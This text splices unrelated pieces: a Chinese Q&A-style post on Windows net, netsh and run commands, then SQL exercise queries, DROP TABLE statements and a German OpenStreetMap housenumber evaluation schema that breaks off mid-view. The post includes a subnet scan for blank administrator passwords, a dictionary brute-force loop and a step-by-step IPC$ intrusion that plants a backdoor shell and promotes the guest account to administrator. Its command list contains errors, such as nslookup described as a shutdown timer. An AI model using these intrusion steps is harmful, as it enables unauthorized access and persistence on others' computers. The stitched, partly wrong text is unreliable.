command_parameters:为特定命令指定参数或命令行开关 IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。 用法举例: @echo off echo 用法格式:test.bat *.*.* > test.txt for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt 存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。 /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 @echo off echo 用法格式:ok.bat ip FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。 Net命令的另类用法 Net User命令是一个DOS命令,必须在Windows XP下的MS-DOS模式下运行,所以首先要进入MS-DOS模式:选择“开始”菜单的“附件”选项的子选项“命令提示符”,或在“开始”菜单的“运行”选项(快捷键为Win+R)中输入“cmd.exe”,进入MS-DOS模式。以下功能都基于此模式下。 建立一个普通新用户在MS-DOS提示符中输入如下命令:“net user john 123 /add”,回车。即可新建一个名为“John”,密码为“123”的新用户。Add参数表示新建用户。 值得注意的是:用户名最多可有 20 个字符,密码最多可有 127 个字符。 建立一个登录时间受限制的用户用以下方法可实现对电脑使用时间的控制。比如,需要建立一个John的用户账号,密码为“123”,登录权限从星期一到星期五的早上八点到晚上十点和双休日的晚上七点到晚上九点。 1. 12小时制可键入如下命令:“net user john 123 /add /times:monday-friday,8AM-10PM;saturday-sunday,7PM-9PM”,回车确定即可。 2. 24小时制可键入如下命令:“net user john 123 /add /times:M-F,8:00-22:00;Sa-Su,19:00-21:00”,回车确定即可。 值得注意的是:Time的增加值限制为1小时。对于Day值,可以用全称或缩写(即 M、T、W、Th、F、Sa、Su)。可以使用12小时或24小时时间表示法。对于12小时表示法,请使用AM、PM或A.M.、P.M.。All值表示用户始终可以登录;空值(空白)意味着用户永远不能登录。用逗号分隔日期和时间,用分号分隔日期和时间单元(例如,M,4AM-5PM;T,1PM-3PM)。指定时间时不要使用空格。 另外,Passwordchg:{yesno}参数可用来指定用户是否可以更改自己的密码,默认设置为 Yes.限定用户的使用时间Net User命令还可以使用参数Expires:{{mm/dd/yyyy dd/mm/yyyy mmm,dd ,yyyy} never} 使用户账号根据指定的Date过期限定用户。过期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm,dd,yyyy]格式。它取决于国家(地区)代码。用户账号在指定日期开始时到期。对于月份值,可以使用数字、全称或三个字母的缩写(即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec)。对于年份值,可以使用两位数或四位数;使用逗号和斜杠分隔日期的各部分;不要使用空格。 Netsh的使用(组图)   有朋友问我,“能不能在命令行下直接修改Windows2000的IP地址?”。      当然是可以的了。不仅可以修改IP地址,和网络相关的每个细节都可以用命令行方式进行配置。      只不过一般大家不太习惯罢了。      方法就是使用系统中提供的一个命令行工具“netsh”:      首先,察看自己现在的ip地址:       列出了两块网卡,其中接口名为“本地连接”的这块网卡配置情况:      使用了固定IP,其中ip地址为192.168.0.4,其他信息略(自己不会看啊)      好了,我们来修改这个IP      改成什么呢,稍微改一点点吧:  现在ip就是192.168.0.5了。      其实刚才改IP的时候并没有把命令写完整,完整的看这个:    一堆命令吧,现在的IP地址已经修改成10.0.0.13了。      当然,命令行下修改IP也可以只用1条命令    到这里,netsh的最最最简单的功能,命令行下修改IP地址 已经说完了      看到一个朋友是做网管的,管理着公司几个不同的网络,每次都要抱着笔记本修改成不同的ip地址、不同的子网掩码、、、其实,只要能够充分的发挥Netsh脚本的功能,就可以最快捷的修改自身的网络配置。        首先,显示一个配置脚本    我们进入Netsh环境,切换到interface ip环境      通过dump命令将当前配置情况显示了出来。      第二步,导出一个配置脚本    这样,我们就把刚才显示的配置脚本保存成了一个文件c:\interface.txt      第三步,复制一个脚本拷贝interface2.txt并修改它      原因?简单嘛,为了更方便的切换网络环境啊    注意哦,我们已经把所需要修改的ip地址、子网掩码、网关和dns做了修改。      最后,再把新的配置文件直接导入系统。    到这里,已经把网络配置部分修改了   总结:      通过Netsh里面的dump命令可以直接显示配置脚本。      而通过netsh -c interface ip dump >c:\interface.txt的方式可以导出配置脚本。      然后再netsh -f c:\interface.txt的方式又可以把导出的配置脚本再导回去。      一来一去间,就可以轻松的实现方便的修改网络配置。      Netsh里面还有很多很多命令,诸如可以进入netsh环境后,在根级目录用exec命令      也可以加载一个配置脚本。      另外还有对wins、路由、ras等网络服务的配置也可以通过Netsh的内置命令直接操作。      Windows的帮助里面都有相关的介绍。 计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 player2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕"讲述人" ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32-------音量控制程序 sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 Nslookup-------60秒倒计时关机命令 tourstart------xp简介(安装完成后出现的漫游xp程序) taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------**整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具,系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略 一 相关命令 建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 删除一个ipc$连接 net use \\IP\ipc$ /del 删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样. 二 经典入侵模式 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机). ipc$经典入侵步骤: 1、net use \\ip\ipc$ 密码 /user:用户名 2、copy 文件名 \\ip\c$ 3、net time \\ip 4、at \\ip 时间 命令 5、入侵成功,连接你的肉鸡 常用的网络命令 net user 查看用户列表 net user 用户名 密码 /add 添加用户 net user 用户名 密码 更改用户密码 net localgroup administrators 用户名 /add 添加用户到管理组 net user 用户名 /delete 删除用户 net user 用户名 查看用户的基本情况 net user 用户名 /active:no 禁用该用户 net user 用户名 /active:yes 启用该用户 net share 查看计算机IPC$共享资源 net share 共享名 查看该共享的情况 net share 共享名=路径 设置共享。例如 net share c$=c: net share 共享名 /delete 删除IPC$共享 net stop lanmanserver 关闭ipc$和默认共享依赖的服务 net use 查看IPC$连接情况 net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接 net use \\ip\ipc$ /del 删除一个连接 net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘 net use z: /del net time \\ip 查看远程计算机上的时间 copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上 net view ip 查看计算机上的共享资源 at 查看自己计算机上的计划作业 at \\ip 查看远程计算机上的计划作业 at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业 at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业 at \\ip all /delete 删除远程计算机上的全部计划作业 at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt; 下面纯手打,上面是度娘给的 taskkill /im 进程名 停止运行 tasklisy 查看运行进程 ipconfig 查看本机IP md 创建文件夹 rd 删除文件夹 echo off > .txt|exit 添加文本 echo 内容 >> .txt 给文本添加内容 copy 复制文件 net user 用户名 密码/add 创建一个普通账号 net localgroup administrators 用户名 /add 把账户加入超级用户组 追问: 好麻烦…… 看不懂 追答: 额。。。 那你先去把基础学了吧
-- Challenge 1 SELECT titleauthor.au_id, authors.au_lname, authors.au_fname, titles.title_id, title, titles.pub_id, pub_name FROM titleauthor JOIN titles ON titleauthor.title_id = titles.title_id JOIN publishers ON publishers.pub_id = titles.pub_id JOIN authors ON authors.au_id = titleauthor.au_id; -- Challenge 2 SELECT authors.au_lname as "Last Name", authors.au_fname as "First Name", pub_name as "Publisher", count(*) as "Title Count" FROM titleauthor JOIN titles ON titleauthor.title_id = titles.title_id JOIN publishers ON publishers.pub_id = titles.pub_id JOIN authors ON authors.au_id = titleauthor.au_id GROUP BY authors.au_id, publishers.pub_id ORDER BY count(*) DESC; -- Challenge 3 SELECT authors.au_id as "Author ID", authors.au_lname as "Last Name", authors.au_fname as "First Name", SUM(ytd_sales) as "Total" FROM titleauthor JOIN titles ON titleauthor.title_id = titles.title_id JOIN publishers ON publishers.pub_id = titles.pub_id RIGHT JOIN authors ON authors.au_id = titleauthor.au_id GROUP BY authors.au_id ORDER BY SUM(ytd_sales) DESC LIMIT 3; -- Challenge 4 SELECT authors.au_id as "Author ID", authors.au_lname as "Last Name", authors.au_fname as "First Name", SUM(ytd_sales) as "Total" FROM titleauthor JOIN titles ON titleauthor.title_id = titles.title_id JOIN publishers ON publishers.pub_id = titles.pub_id RIGHT JOIN authors ON authors.au_id = titleauthor.au_id GROUP BY authors.au_id ORDER BY SUM(ytd_sales) DESC;
-- apply changes alter table person add column date_bith date default '1000-01-01' not null;
DROP TABLE IF EXISTS schema_versions; DROP TABLE IF EXISTS scd_constraints; DROP TABLE IF EXISTS scd_cells_operations; DROP TABLE IF EXISTS scd_operations; DROP TABLE IF EXISTS scd_cells_subscriptions; DROP TABLE IF EXISTS scd_subscriptions;
-- -- V2.0, 2018-04-28, Dietmar Seifert -- This script -- only creates optionally Tables and Views for -- theoretical housenumber evaluation (only germany as of 2018-04). -- -- The housenumber evaluation DB must already be created. -- The base DB strucutre must already be created, see dbstructure.sql -- The mandatory project specific DB functions must already be created, see dbfunctions.sql -- ============================================================================================ -- Tables for theoretical housenumber evaluation -- ============================================================================================ -- Table: theoevaluations CREATE TABLE theoevaluations ( id bigserial NOT NULL, land text NOT NULL, stadt text NOT NULL, gemeinde_id text, flaechekm2 real, bevoelkerungszahl integer, gliederungstadtland smallint, anzahl_osmadressen bigint NOT NULL, anzahl_osmadressennodes bigint NOT NULL, anzahl_osmadressenways bigint NOT NULL, anzahl_osmadressenrels bigint NOT NULL, anzahl_nodes_addrstreet_treffer bigint, anzahl_ways_addrstreet_treffer bigint, anzahl_polygons_addrstreet_treffer bigint, anzahl_nodes_associatedstreet_treffer bigint, anzahl_ways_associatedstreet_treffer bigint, anzahl_polygons_associatedstreet_treffer bigint, anzahl_osmadressenplaces bigint, anzahl_osmadressennodesunvollstaendig bigint NOT NULL, anzahl_osmadressenwaysunvollstaendig bigint NOT NULL, anzahl_osmadressenrelsunvollstaendig bigint NOT NULL, tstamp timestamp without time zone NOT NULL, -- timestamp of evaluation osmdb_tstamp timestamp without time zone, -- timestamp of OSM DB at evaluation start time polygon geometry, CONSTRAINT pk_theoevaluation PRIMARY KEY (id) ) WITH (OIDS=FALSE); CREATE INDEX idx_theoevaluations_gemeindeid ON theoevaluations USING btree(gemeinde_id); -- ============================================================================================ -- Views for theoretical housenumber evaluation -- ============================================================================================ CREATE MATERIALIZED VIEW theoeval201802 AS SELECT id, land, stadt, gemeinde_id, flaechekm2, bevoelkerungszahl, gliederungstadtland, anzahl_osmadressen, anzahl_osmadressennodes, anzahl_osmadressenways, anzahl_osmadressenrels, (anzahl_osmadressennodesunvollstaendig + anzahl_osmadressenwaysunvollstaendig + anzahl_osmadressenrelsunvollstaendig) AS anzahl_osmadressenunvollstaendig, anzahl_osmadressennodesunvollstaendig, anzahl_osmadressenwaysunvollstaendig, anzahl_osmadressenrelsunvollstaendig, tstamp, osmdb_tstamp, anzahl_nodes_addrstreet_treffer, anzahl_ways_addrstreet_treffer, anzahl_polygons_addrstreet_treffer, (anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer) AS anzahl_osmadressen_addrstreet, anzahl_nodes_associatedstreet_treffer, anzahl_ways_associatedstreet_treffer, anzahl_polygons_associatedstreet_treffer, (anzahl_nodes_associatedstreet_treffer + anzahl_ways_associatedstreet_treffer + anzahl_polygons_associatedstreet_treffer) AS anzahl_osmadressen_associatedstreet, anzahl_osmadressenplaces, polygon, CASE WHEN anzahl_osmadressen = 0 THEN 0 ELSE 100.0*(anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer)/anzahl_osmadressen END AS anzahl_osmadressen_addrstreetanteil, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_anzahl_adressen, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_adressenabdeckung FROM theoevaluations where tstamp > '2018-03-01' and tstamp < '2018-03-03'; CREATE MATERIALIZED VIEW theoeval201803 AS SELECT id, land, stadt, gemeinde_id, flaechekm2, bevoelkerungszahl, gliederungstadtland, anzahl_osmadressen, anzahl_osmadressennodes, anzahl_osmadressenways, anzahl_osmadressenrels, (anzahl_osmadressennodesunvollstaendig + anzahl_osmadressenwaysunvollstaendig + anzahl_osmadressenrelsunvollstaendig) AS anzahl_osmadressenunvollstaendig, anzahl_osmadressennodesunvollstaendig, anzahl_osmadressenwaysunvollstaendig, anzahl_osmadressenrelsunvollstaendig, tstamp, osmdb_tstamp, anzahl_nodes_addrstreet_treffer, anzahl_ways_addrstreet_treffer, anzahl_polygons_addrstreet_treffer, (anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer) AS anzahl_osmadressen_addrstreet, anzahl_nodes_associatedstreet_treffer, anzahl_ways_associatedstreet_treffer, anzahl_polygons_associatedstreet_treffer, (anzahl_nodes_associatedstreet_treffer + anzahl_ways_associatedstreet_treffer + anzahl_polygons_associatedstreet_treffer) AS anzahl_osmadressen_associatedstreet, anzahl_osmadressenplaces, polygon, CASE WHEN anzahl_osmadressen = 0 THEN 0 ELSE 100.0*(anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer)/anzahl_osmadressen END AS anzahl_osmadressen_addrstreetanteil, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_anzahl_adressen, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_adressenabdeckung FROM theoevaluations where tstamp > '2018-04-01' and tstamp < '2018-04-04'; CREATE MATERIALIZED VIEW theoeval201804 AS SELECT id, land, stadt, gemeinde_id, flaechekm2, bevoelkerungszahl, gliederungstadtland, anzahl_osmadressen, anzahl_osmadressennodes, anzahl_osmadressenways, anzahl_osmadressenrels, (anzahl_osmadressennodesunvollstaendig + anzahl_osmadressenwaysunvollstaendig + anzahl_osmadressenrelsunvollstaendig) AS anzahl_osmadressenunvollstaendig, anzahl_osmadressennodesunvollstaendig, anzahl_osmadressenwaysunvollstaendig, anzahl_osmadressenrelsunvollstaendig, tstamp, osmdb_tstamp, anzahl_nodes_addrstreet_treffer, anzahl_ways_addrstreet_treffer, anzahl_polygons_addrstreet_treffer, (anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer) AS anzahl_osmadressen_addrstreet, anzahl_nodes_associatedstreet_treffer, anzahl_ways_associatedstreet_treffer, anzahl_polygons_associatedstreet_treffer, (anzahl_nodes_associatedstreet_treffer + anzahl_ways_associatedstreet_treffer + anzahl_polygons_associatedstreet_treffer) AS anzahl_osmadressen_associatedstreet, anzahl_osmadressenplaces, polygon, CASE WHEN anzahl_osmadressen = 0 THEN 0 ELSE 100.0*(anzahl_nodes_addrstreet_treffer + anzahl_ways_addrstreet_treffer + anzahl_polygons_addrstreet_treffer)/anzahl_osmadressen END AS anzahl_osmadressen_addrstreetanteil, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN round(bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_anzahl_adressen, CASE WHEN flaechekm2 > 0 AND bevoelkerungszahl > 0 AND bevoelkerungszahl <= 5000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000920645 * bevoelkerungszahl/flaechekm2 + 3.002091115)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 5000 AND bevoelkerungszahl <= 20000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000509945 * bevoelkerungszahl/flaechekm2 + 3.086196323)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 20000 AND bevoelkerungszahl <= 100000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000865691 * bevoelkerungszahl/flaechekm2 + 3.490431037)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 100000 AND bevoelkerungszahl <= 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.000728235 * bevoelkerungszahl/flaechekm2 + 3.394332878)) WHEN flaechekm2 > 0 AND bevoelkerungszahl > 250000 THEN 100 * anzahl_osmadressen / (bevoelkerungszahl * 1.052178115 / (0.001400991 * bevoelkerungszahl/flaechekm2 + 3.46995551)) ELSE 0 END AS theo_adressenabdeckung FROM theoevaluations where tstamp > '2018-05-01' and tstamp < '2018-05-04'; -- TODOMONTHLY CREATE MATERIALIZED VIEW theoeval201803diff201802 AS SELECT te2.land AS land, te2.stadt AS stadt, te2.gemeinde_id AS gemeinde_id, te2.flaechekm2 AS flaechekm2, te2.bevoelkerungszahl AS bevoelkerungszahl, te2.gliederungstadtland AS gliederungstadtland, (te2.anzahl_osmadressen - te1.anzahl_osmadressen) AS diff_anzahl_osmadressen, te2.anzahl_osmadressen AS neue_anzahl_osmadressen, te1.anzahl_osmadressen AS alte_anzahl_osmadressen, te2.theo_anzahl_adressen AS neue_theo_anzahl_adressen, te1.theo_anzahl_adressen AS alte_theo_anzahl_adressen, round(CAST(te2.theo_adressenabdeckung AS NUMERIC),1) AS neue_theo_adressenabdeckung, round(CAST(te1.theo_adressenabdeckung AS NUMERIC),1) AS alte_theo_adressenabdeckung, to_char(te2.tstamp, 'DD.MM.YYYY HH24:MI') AS neue_tstamp, to_char(te1.tstamp, 'DD.MM.YYYY HH24:MI') AS alte_tstamp, te2.polygon as polygon FROM theoeval201803 AS te2, theoeval201802 AS te1 WHERE te2.gemeinde_id = te1.gemeinde_id AND te2.land = te1.land AND te2.land = 'Bundesrepublik Deutschland'; CREATE MATERIALIZED VIEW theoeval201804diff201803 AS SELECT te2.land AS land, te2.stadt AS stadt, te2.gemeinde_id AS gemeinde_id, te2.flaechekm2 AS flaechekm2, te2.bevoelkerungszahl AS bevoelkerungszahl, te2.gliederungstadtland AS gliederungstadtland, (te2.anzahl_osmadressen - te1.anzahl_osmadressen) AS diff_anzahl_osmadressen, te2.anzahl_osmadressen AS neue_anzahl_osmadressen, te1.anzahl_osmadressen AS alte_anzahl_osmadressen, te2.theo_anzahl_adressen AS neue_theo_anzahl_adressen, te1.theo_anzahl_adressen AS alte_theo_anzahl_adressen, round(CAST(te2.theo_adressenabdeckung AS NUMERIC),1) AS neue_theo_adressenabdeckung, round(CAST(te1.theo_adressenabdeckung AS NUMERIC),1) AS alte_theo_adressenabdeckung, to_char(te2.tstamp, 'DD.MM.YYYY HH24:MI') AS neue_tstamp, to_char(te1.tstamp, 'DD.MM.YYYY HH24:MI') AS alte_tstamp, te2.polygon as polygon FROM theoeval201804 AS te2, theoeval201803 AS te1 WHERE te2.gemeinde_id = te1.gemeinde_id AND te2.land = te1.land AND te2.land = 'Bundesrepublik Deutschland'; -- TODOMONTHLY -- Comparation yearly CREATE OR REPLACE VIEW theoeval201612diff201601 AS SELECT te2.land AS land, te2.stadt AS stadt, te2.gemeinde_id AS gemeinde_id, te2.flaechekm2 AS flaechekm2, te2.bevoelkerungszahl AS bevoelkerungszahl, te2.gliederungstadtland AS gliederungstadtland, (te2.anzahl_osmadressen - te1.anzahl_osmadressen) AS diff_anzahl_osmadressen, te2.anzahl_osmadressen 